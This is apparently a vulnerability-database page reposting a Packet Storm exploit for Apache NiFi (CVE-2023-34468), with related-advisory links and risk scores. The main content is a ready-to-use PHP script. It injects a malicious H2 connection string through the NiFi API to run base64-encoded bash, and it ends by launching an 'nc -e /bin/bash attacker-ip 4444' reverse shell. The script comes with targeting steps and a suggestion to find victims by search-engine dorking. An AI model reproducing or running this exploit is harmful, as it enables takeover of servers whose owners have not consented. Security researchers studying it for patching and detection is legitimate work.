Apache NiFi 0.0.2 Remote Code Execution

🗓️ 10 Mar 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 470 Views

Apache NiFi 0.0.2 remote code execution vulnerability exploit details and code example provided.

Reporter	Title	Published	Views	Family All 26
GithubExploit	Exploit for Code Injection in Apache Nifi	10 May 202615:43	–	githubexploit
GithubExploit	Exploit for Code Injection in Apache Nifi	10 May 202619:31	–	githubexploit
0day.today	Apache NiFi H2 Connection String Remote Code Execution Exploit	30 Aug 202300:00	–	zdt
Circl	CVE-2023-34468	30 Aug 202313:14	–	circl
CNNVD	Apache NiFi 代码注入漏洞	12 Jun 202300:00	–	cnnvd
CVE	CVE-2023-34468	12 Jun 202315:09	–	cve
Cvelist	CVE-2023-34468 Apache NiFi: Potential Code Injection with Database Services using H2	12 Jun 202315:09	–	cvelist
Github Security Blog	Apache NiFi vulnerable to Code Injection	12 Jun 202318:30	–	github
Metasploit	Apache NiFi H2 Connection String Remote Code Execution	30 Aug 202319:51	–	metasploit
NVD	CVE-2023-34468	12 Jun 202316:15	–	nvd

=============================================================================================================================================
    | # Title     : Apache NiFi 0.0.2 RCE Vulnerability                                                                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://nifi.apache.org/                                                                                                    |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description:  exploit remote command execution vulnerability in Apache NiFi
    
       (Related : https://packetstorm.news/files/id/174398/ Related CVE numbers: CVE-2023-34468 ) .
    	
    [+] save code as poc.php.
    
    [+] Set TArget : line 61 + 62
    
    [+] PayLoad :
    
    <?php
    // سكربت لاستغلال ثغرة تنفيذ الأوامر عن بُعد في Apache NiFi
    
    class ApacheNiFiExploit {
        private $target;
        private $token;
    
        public function __construct($target, $token = null) {
            $this->target = rtrim($target, '/');
            $this->token = $token;
        }
    
        private function sendRequest($endpoint, $method = 'GET', $data = null) {
            $url = "$this->target/$endpoint";
            $ch = curl_init($url);
            
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
            
            if ($this->token) {
                curl_setopt($ch, CURLOPT_HTTPHEADER, ["Authorization: Bearer $this->token"]);
            }
            
            if ($data) {
                curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
                curl_setopt($ch, CURLOPT_HTTPHEADER, array_merge([
                    'Content-Type: application/json'
                ], $this->token ? ["Authorization: Bearer $this->token"] : []));
            }
    
            $response = curl_exec($ch);
            curl_close($ch);
            return json_decode($response, true);
        }
    
        public function exploit($payload) {
            $b64_payload = base64_encode($payload);
            $db_name = bin2hex(random_bytes(4));
            $trigger_name = strtoupper(bin2hex(random_bytes(4)));
            
            $db_config = [
                'component' => [
                    'name' => 'ExploitDBPool',
                    'properties' => [
                        'Database Connection URL' => "jdbc:h2:file:/tmp/$db_name.db;CREATE TRIGGER $trigger_name BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,$b64_payload}|{base64,-d}|{bash,-i}')\n$$--=x",
                        'Database Driver Class Name' => 'org.h2.Driver'
                    ]
                ]
            ];
            
            $response = $this->sendRequest('nifi-api/controller-services', 'POST', $db_config);
            
            if (isset($response['component']['id'])) {
                echo "[+] تم إنشاء واستغلال خدمة الاتصال بقاعدة البيانات بنجاح!";
            } else {
                echo "[-] فشل في تنفيذ الهجوم.";
            }
        }
    }
    
    $target = 'https://target-nifi-instance.com';
    $token = 'YOUR_BEARER_TOKEN'; // إذا كانت المصادقة مطلوبة
    $exploit = new ApacheNiFiExploit($target, $token);
    $exploit->exploit('nc -e /bin/bash attacker-ip 4444');
    
    
    
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

10 Mar 2025 00:00Current

9.3High risk

Vulners AI Score9.3

CVSS 3.18.8

EPSS0.78065

SSVC